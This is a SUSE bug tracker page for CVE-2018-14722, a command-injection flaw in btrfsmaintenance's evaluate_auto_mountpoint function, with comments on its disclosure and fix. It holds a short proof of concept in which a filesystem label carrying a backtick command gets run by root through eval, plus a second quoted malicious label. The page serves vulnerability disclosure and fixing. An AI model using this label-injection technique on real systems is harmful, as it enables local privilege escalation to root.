First Last Prev Next    This bug is not in your last search results.
Bug 1102721 - (CVE-2018-14722) VUL-0: CVE-2018-14722: btrfsmaintenance: Code execution
(CVE-2018-14722)
VUL-0: CVE-2018-14722: btrfsmaintenance: Code execution
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: David Sterba
Security Team bot
https://smash.suse.de/issue/211726/
CVSSv3.1:SUSE:CVE-2018-14722:6.7:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2018-07-26 09:28 UTC by Karol Babioch
Modified: 2021-07-19 14:26 UTC (History)
5 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Karol Babioch 2018-07-26 09:28:30 UTC 
Hi,

I just stumbled across the evaluate_auto_mountpoint function in
/usr/share/btrfsmaintenance/btrfsmaintenance-functions.

# function: evaluate_auto_mountpoint
# parameter: A variable name
#
# this function checks whether the variable contains the special keyword "auto"
# if yes, all currently mounted btrfs filesystems are evaluated and their mountpoints
# are put into the parameter variable
evaluate_auto_mountpoint() {
        MOUNTPOINTSVAR=\$"$1"
        if [ "$(eval expr \"$MOUNTPOINTSVAR\")" = "auto" ]; then
                ...
                # find one (and only one) corresponding mountpoint for each btrfs device node
                for DEVICE in $BTRFS_DEVICES; do
                        MNT=$(findmnt --types btrfs --first-only --noheadings --output "TARGET" --source "$DEVICE")
                        if [ -n "$MNTLIST" ]; then
                                MNTLIST="$MNTLIST:$MNT"
                        else
                                MNTLIST="$MNT"
                        fi
                done
                echo "evaluate mounted filesystems: $MNTLIST"
                eval "$1=$MNTLIST"
        fi
}

The 'eval "$1=$MNTLIST"' allows bash command evaluation.
This is triggered by btrfs-{scrub,balance,trim}.timer units if the respective
option in /etc/sysconfig/btrfsmaintenance is set to "auto". Fortunately that is
not the default.

PoC:

> mkfs.btrfs -fL '`logger pwned`' /dev/sdc2
(mount as user using your favorite tool)
> (as root, to accelerate) systemctl start btrfs-trim
> journalctl
...
Jul 26 10:55:57 linux-e202.suse.de btrfs-trim.sh[23928]: evaluate mounted filesystems: /run/media/fvogt/`logger pwned`
Jul 26 10:55:57 linux-e202.suse.de root[23943]: pwned
...

Cheers,
Fabian
Comment 8 Karol Babioch 2018-07-30 06:42:16 UTC 
CVE-2018-14722 has been assigned to this. We are planning to announce this via linux-distros to let other distributions know. This will give us (at maximum) a two weeks window of opportunity to get this fixed in time.
Comment 14 David Sterba 2018-08-09 12:33:02 UTC 
Created attachment 779339 [details]
expand-auto-safely-v2

Fixed typo, updated changelog.
Comment 16 Fabian Vogt 2018-08-09 12:54:55 UTC 
Comment on attachment 779339 [details]
expand-auto-safely-v2

There's a typo in the commit message:

> mkfs.btrfs --label "`/evil/command`' /dev/sdx

The only bug that remains is that with ":" in mountpoints it won't do its job for that device, but not break anything else. So not a security relevant bug AFAICT.
Comment 17 Marcus Meissner 2018-08-14 15:54:15 UTC 
making public
Comment 19 David Sterba 2018-09-25 14:16:55 UTC 
Upstream release 0.4.2 contains the fix, now submitted to Factory. I'll continue with SLE15 update.
Comment 20 Johannes Segitz 2018-10-09 11:08:35 UTC 
(In reply to David Sterba from comment #19)
didn't see it until now, please submit.  Thank you
Comment 23 Marcus Meissner 2021-07-19 14:26:25 UTC 
not yet submitte for SUSE:SLE-15:Update.

we rate it below cvss v3.1 score 7, so we will not addres it for SLE 15 update.
First Last Prev Next    This bug is not in your last search results.